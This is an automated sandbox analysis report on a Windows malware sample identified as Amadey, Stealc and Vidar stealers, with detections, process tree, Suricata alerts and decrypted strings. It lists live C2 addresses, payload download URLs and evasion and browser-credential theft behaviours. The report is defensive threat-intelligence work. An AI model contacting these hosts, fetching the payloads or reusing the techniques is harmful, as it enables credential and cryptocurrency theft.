Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:	file.exe
Analysis ID:	1570584
MD5:	443c778fc72c59824a828ece66b8e82a
SHA1:	91fb9df41bba19b6d6612bbafd6d35dc81dc01d6
SHA256:	a43029c07921865be726ccc99e368b445715a3e55279c7faaaae5cad38eb4276
Tags:	exeuser-Bitsight
Infos:

Detection

Amadey, Stealc, Vidar

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for URL or domain

Antivirus detection for dropped file

Attempt to bypass Chrome Application-Bound Encryption

Detected unpacking (changes PE section rights)

Found malware configuration

Multi AV Scanner detection for domain / URL

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Amadeys stealer DLL

Yara detected Powershell download and execute

Yara detected Stealc

Yara detected Vidar stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Drops PE files to the document folder of the user

Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)

Found many strings related to Crypto-Wallets (likely being stolen)

Hides threads from debuggers

Machine Learning detection for dropped file

Machine Learning detection for sample

Monitors registry run keys for changes

PE file contains section with special chars

Potentially malicious time measurement code found

Sample uses string decryption to hide its real strings

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Tries to detect sandboxes and other dynamic analysis tools (window names)

Tries to detect virtualization through RDTSC time measurements

Tries to evade debugger and weak emulator (self modifying code)

Tries to harvest and steal Bitcoin Wallet information

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

Tries to steal Mail credentials (via file / registry access)

Yara detected Generic Downloader

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks for debuggers (devices)

Checks if the current process is being debugged

Contains capabilities to detect virtual machines

Contains functionality for execution timing, often used to detect debuggers

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to read the PEB

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates files inside the system directory

Creates job files (autostart)

Detected potential crypto function

Downloads executable code via HTTP

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Entry point lies outside standard sections

Extensive use of GetProcAddress (often used to hide API calls)

Found dropped PE file which has not been started or loaded

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains an invalid checksum

PE file contains sections with non-standard names

Queries information about the installed CPU (vendor, model number etc)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Sigma detected: Browser Started with Remote Debugging

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses code obfuscation techniques (call, push, ret)

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

file.exe (PID: 7484 cmdline: "C:\Users\user\Desktop\file.exe" MD5: 443C778FC72C59824A828ECE66B8E82A)

chrome.exe (PID: 8084 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

chrome.exe (PID: 3200 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2224 --field-trial-handle=2172,i,17693592951107771680,17343620240284749049,262144 /prefetch:8 MD5: 5BBFA6CBDF4C254EB368D534F9E23C92)

msedge.exe (PID: 8804 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="" MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 9016 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2084,i,17208139425512055275,10975637639687312567,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

cmd.exe (PID: 8112 cmdline: "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\DGCAAFBFBK.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 8124 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

DGCAAFBFBK.exe (PID: 7796 cmdline: "C:\Users\user\Documents\DGCAAFBFBK.exe" MD5: C0D113D521F4055CE2D25BA430F7789D)

skotes.exe (PID: 5720 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: C0D113D521F4055CE2D25BA430F7789D)

msedge.exe (PID: 9100 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: BF154738460E4AB1D388970E1AB13FAB)

msedge.exe (PID: 7968 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2300 --field-trial-handle=2060,i,12344348702254346742,4398189957191153386,262144 /prefetch:3 MD5: BF154738460E4AB1D388970E1AB13FAB)

skotes.exe (PID: 8624 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: C0D113D521F4055CE2D25BA430F7789D)

JoYUT4N.exe (PID: 9040 cmdline: "C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe" MD5: 0141BAF82BB318D465D2207BE71876EF)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Amadey	Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://asec.ahnlab.com/en/36634/ https://asec.ahnlab.com/en/40483/ https://asec.ahnlab.com/en/41450/ https://asec.ahnlab.com/en/44504/	https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name	Description	Attribution	Blogpost URLs	Link
Stealc	Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.	No Attribution	https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-1/ https://blog.sekoia.io/stealc-a-copycat-of-vidar-and-raccoon-infostealers-gaining-in-popularity-part-2/ https://cocomelonc.github.io/book/2023/12/13/malwild-book.html	https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Name	Description	Attribution	Blogpost URLs	Link
Vidar	Vidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.	No Attribution	https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-1-(-Unpacking-)/ https://0x00-0x7f.github.io/A-Case-of-Vidar-Infostealer-Part-2/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/vidar-stealer-h-and-m-campaign https://0xtoxin.github.io/malware%20analysis/Vidar-Stealer-Campaign/ https://asec.ahnlab.com/en/22932/	https://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Threatname: Amadey

{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
dump.pcap	JoeSecurity_Stealc_1	Yara detected Stealc	Joe Security

Dropped Files

Source	Rule	Description	Author	Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000017.00000002.3387296289.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000015.00000002.2798800091.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
00000000.00000002.2720322383.0000000000521000.00000040.00000001.01000000.00000003.sdmp	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
00000014.00000002.2758050917.00000000007D1000.00000040.00000001.01000000.0000000B.sdmp	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
Process Memory Space: file.exe PID: 7484	JoeSecurity_Vidar_1	Yara detected Vidar stealer	Joe Security
Process Memory Space: file.exe PID: 7484	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security
Process Memory Space: file.exe PID: 7484	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: file.exe PID: 7484	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
decrypted.memstr	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 5 entries

Unpacked PEs

Source	Rule	Description	Author
24.0.JoYUT4N.exe.9c0000.0.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
21.2.skotes.exe.b00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
23.2.skotes.exe.b00000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
20.2.DGCAAFBFBK.exe.7d0000.0.unpack	JoeSecurity_Amadey_2	Yara detected Amadey\'s stealer DLL	Joe Security
0.2.file.exe.520000.0.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.file.exe.520000.0.unpack	JoeSecurity_Stealc	Yara detected Stealc	Joe Security
Click to see the 1 entries

Sigma Signatures

System Summary

Sigma detected: Browser Started with Remote Debugging

Source: Process started

Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\Desktop\file.exe", ParentImage: C:\Users\user\Desktop\file.exe, ParentProcessId: 7484, ParentProcessName: file.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 8084, ProcessName: chrome.exe

Suricata Signatures

ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:53:16.137148+0100	2044696	1	A Network Trojan was detected	192.168.2.6	50014	185.215.113.43	80	TCP

ET MALWARE Win32/Stealc Active C2 Responding with browsers Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:14.567257+0100	2044245	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49713	TCP

ET MALWARE Win32/Stealc Requesting browsers Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:14.254125+0100	2044244	1	Malware Command and Control Activity Detected	192.168.2.6	49713	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Requesting plugins Config from C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:14.892593+0100	2044246	1	Malware Command and Control Activity Detected	192.168.2.6	49713	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc Submitting System Information to C2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:16.521570+0100	2044248	1	Malware Command and Control Activity Detected	192.168.2.6	49713	185.215.113.206	80	TCP

ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:15.205892+0100	2044247	1	Malware Command and Control Activity Detected	185.215.113.206	80	192.168.2.6	49713	TCP

ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:13.807119+0100	2044243	1	Malware Command and Control Activity Detected	192.168.2.6	49713	185.215.113.206	80	TCP

ETPRO MALWARE Amadey CnC Activity M3

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:53:06.761844+0100	2856147	1	A Network Trojan was detected	192.168.2.6	50004	185.215.113.43	80	TCP

ETPRO MALWARE Amadey CnC Response M1

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:53:14.774074+0100	2856122	1	A Network Trojan was detected	185.215.113.43	80	192.168.2.6	50010	TCP

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:53:11.244001+0100	2803305	3	Unknown Traffic	192.168.2.6	50013	31.41.244.11	80	TCP

ETPRO MALWARE Common Downloader Header Pattern HCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2024-12-07T10:51:17.234329+0100	2803304	3	Unknown Traffic	192.168.2.6	49713	185.215.113.206	80	TCP
2024-12-07T10:51:46.182002+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:48.243875+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:49.626984+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:50.821326+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:54.274531+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:51:55.378469+0100	2803304	3	Unknown Traffic	192.168.2.6	49808	185.215.113.206	80	TCP
2024-12-07T10:52:01.000347+0100	2803304	3	Unknown Traffic	192.168.2.6	49852	185.215.113.16	80	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: file.exe

Avira: detected

Antivirus detection for URL or domain

Source: http://185.215.113.206/68b591d6548ec281/vcruntime140.dllO	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7995533987/JoYUT4N.exeHFsp	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpe1daae79862fa0ab8ea5ae274af5Extension	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/nss3.dll/	Avira URL Cloud: Label: malware
Source: http://185.215.113.43/Zu7JuNko/index.php1012911001	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7995533987/JoYUT4N.exeshqos.dll	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7995533987/JoYUT4N.exe	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/68b591d6548ec281/msvcp140.dllu	Avira URL Cloud: Label: malware
Source: http://31.41.244.11/files/7995533987/JoYUT4N.exeXYZ0123456789	Avira URL Cloud: Label: malware
Source: http://185.215.113.206/c4becf79229cb002.phpTE	Avira URL Cloud: Label: malware

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	Avira: detection malicious, Label: HEUR/AGEN.1360153
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Avira: detection malicious, Label: TR/Crypt.TPM.Gen
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Avira: detection malicious, Label: HEUR/AGEN.1360153

Found malware configuration

Source: 00000017.00000002.3387296289.0000000000B01000.00000040.00000001.01000000.0000000D.sdmp	Malware Configuration Extractor: Amadey {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Source: 00000000.00000002.2722572353.0000000000B0E000.00000004.00000020.00020000.00000000.sdmp	Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}

Multi AV Scanner detection for domain / URL

Source: http://185.215.113.206/68b591d6548ec281/nss3.dll/

Virustotal: Detection: 19%

Perma Link

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	ReversingLabs: Detection: 18%
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	ReversingLabs: Detection: 18%

Multi AV Scanner detection for submitted file

Source: file.exe	ReversingLabs: Detection: 47%
Source: file.exe	Virustotal: Detection: 49%			Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Joe Sandbox ML: detected
Source: C:\Users\user\Documents\DGCAAFBFBK.exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\JoYUT4N[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\random[1].exe	Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\1012911001\JoYUT4N.exe	Joe Sandbox ML: detected

Machine Learning detection for sample

Source: file.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 0.2.file.exe.520000.0.unpack	String decryptor: INSERT_KEY_HERE
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 07
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 01
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 20
Source: 0.2.file.exe.520000.0.unpack	String decryptor: 25
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetProcAddress
Source: 0.2.file.exe.520000.0.unpack	String decryptor: LoadLibraryA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: lstrcatA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: OpenEventA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateEventA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CloseHandle
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Sleep
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetUserDefaultLangID
Source: 0.2.file.exe.520000.0.unpack	String decryptor: VirtualAllocExNuma
Source: 0.2.file.exe.520000.0.unpack	String decryptor: VirtualFree
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetSystemInfo
Source: 0.2.file.exe.520000.0.unpack	String decryptor: VirtualAlloc
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HeapAlloc
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetComputerNameA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: lstrcpyA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetProcessHeap
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetCurrentProcess
Source: 0.2.file.exe.520000.0.unpack	String decryptor: lstrlenA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ExitProcess
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GlobalMemoryStatusEx
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetSystemTime
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SystemTimeToFileTime
Source: 0.2.file.exe.520000.0.unpack	String decryptor: advapi32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: gdi32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: user32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: crypt32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetUserNameA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateDCA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetDeviceCaps
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ReleaseDC
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CryptStringToBinaryA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: sscanf
Source: 0.2.file.exe.520000.0.unpack	String decryptor: VMwareVMware
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HAL9TH
Source: 0.2.file.exe.520000.0.unpack	String decryptor: JohnDoe
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DISPLAY
Source: 0.2.file.exe.520000.0.unpack	String decryptor: %hu/%hu/%hu
Source: 0.2.file.exe.520000.0.unpack	String decryptor: http://185.215.113.206
Source: 0.2.file.exe.520000.0.unpack	String decryptor: /c4becf79229cb002.php
Source: 0.2.file.exe.520000.0.unpack	String decryptor: /68b591d6548ec281/
Source: 0.2.file.exe.520000.0.unpack	String decryptor: drum
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetEnvironmentVariableA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetFileAttributesA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: HeapFree
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetFileSize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GlobalSize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateToolhelp32Snapshot
Source: 0.2.file.exe.520000.0.unpack	String decryptor: IsWow64Process
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Process32Next
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetLocalTime
Source: 0.2.file.exe.520000.0.unpack	String decryptor: FreeLibrary
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetTimeZoneInformation
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetSystemPowerStatus
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetVolumeInformationA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetWindowsDirectoryA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: Process32First
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetLocaleInfoA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetUserDefaultLocaleName
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetModuleFileNameA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DeleteFileA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: FindNextFileA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: LocalFree
Source: 0.2.file.exe.520000.0.unpack	String decryptor: FindClose
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SetEnvironmentVariableA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: LocalAlloc
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetFileSizeEx
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ReadFile
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SetFilePointer
Source: 0.2.file.exe.520000.0.unpack	String decryptor: WriteFile
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateFileA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: FindFirstFileA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CopyFileA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: VirtualProtect
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetLogicalProcessorInformationEx
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetLastError
Source: 0.2.file.exe.520000.0.unpack	String decryptor: lstrcpynA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: MultiByteToWideChar
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GlobalFree
Source: 0.2.file.exe.520000.0.unpack	String decryptor: WideCharToMultiByte
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GlobalAlloc
Source: 0.2.file.exe.520000.0.unpack	String decryptor: OpenProcess
Source: 0.2.file.exe.520000.0.unpack	String decryptor: TerminateProcess
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetCurrentProcessId
Source: 0.2.file.exe.520000.0.unpack	String decryptor: gdiplus.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: ole32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: bcrypt.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: wininet.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: shlwapi.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: shell32.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: rstrtmgr.dll
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateCompatibleBitmap
Source: 0.2.file.exe.520000.0.unpack	String decryptor: SelectObject
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BitBlt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: DeleteObject
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateCompatibleDC
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipGetImageEncodersSize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipGetImageEncoders
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipCreateBitmapFromHBITMAP
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdiplusStartup
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdiplusShutdown
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipSaveImageToStream
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipDisposeImage
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GdipFree
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetHGlobalFromStream
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CreateStreamOnHGlobal
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CoUninitialize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CoInitialize
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CoCreateInstance
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptGenerateSymmetricKey
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptCloseAlgorithmProvider
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptDecrypt
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptSetProperty
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptDestroyKey
Source: 0.2.file.exe.520000.0.unpack	String decryptor: BCryptOpenAlgorithmProvider
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetWindowRect
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetDesktopWindow
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetDC
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CloseWindow
Source: 0.2.file.exe.520000.0.unpack	String decryptor: wsprintfA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: EnumDisplayDevicesA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: GetKeyboardLayoutList
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CharToOemW
Source: 0.2.file.exe.520000.0.unpack	String decryptor: wsprintfW
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RegQueryValueExA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RegEnumKeyExA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RegOpenKeyExA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RegCloseKey
Source: 0.2.file.exe.520000.0.unpack	String decryptor: RegEnumValueA
Source: 0.2.file.exe.520000.0.unpack	String decryptor: CryptBinaryToStringA
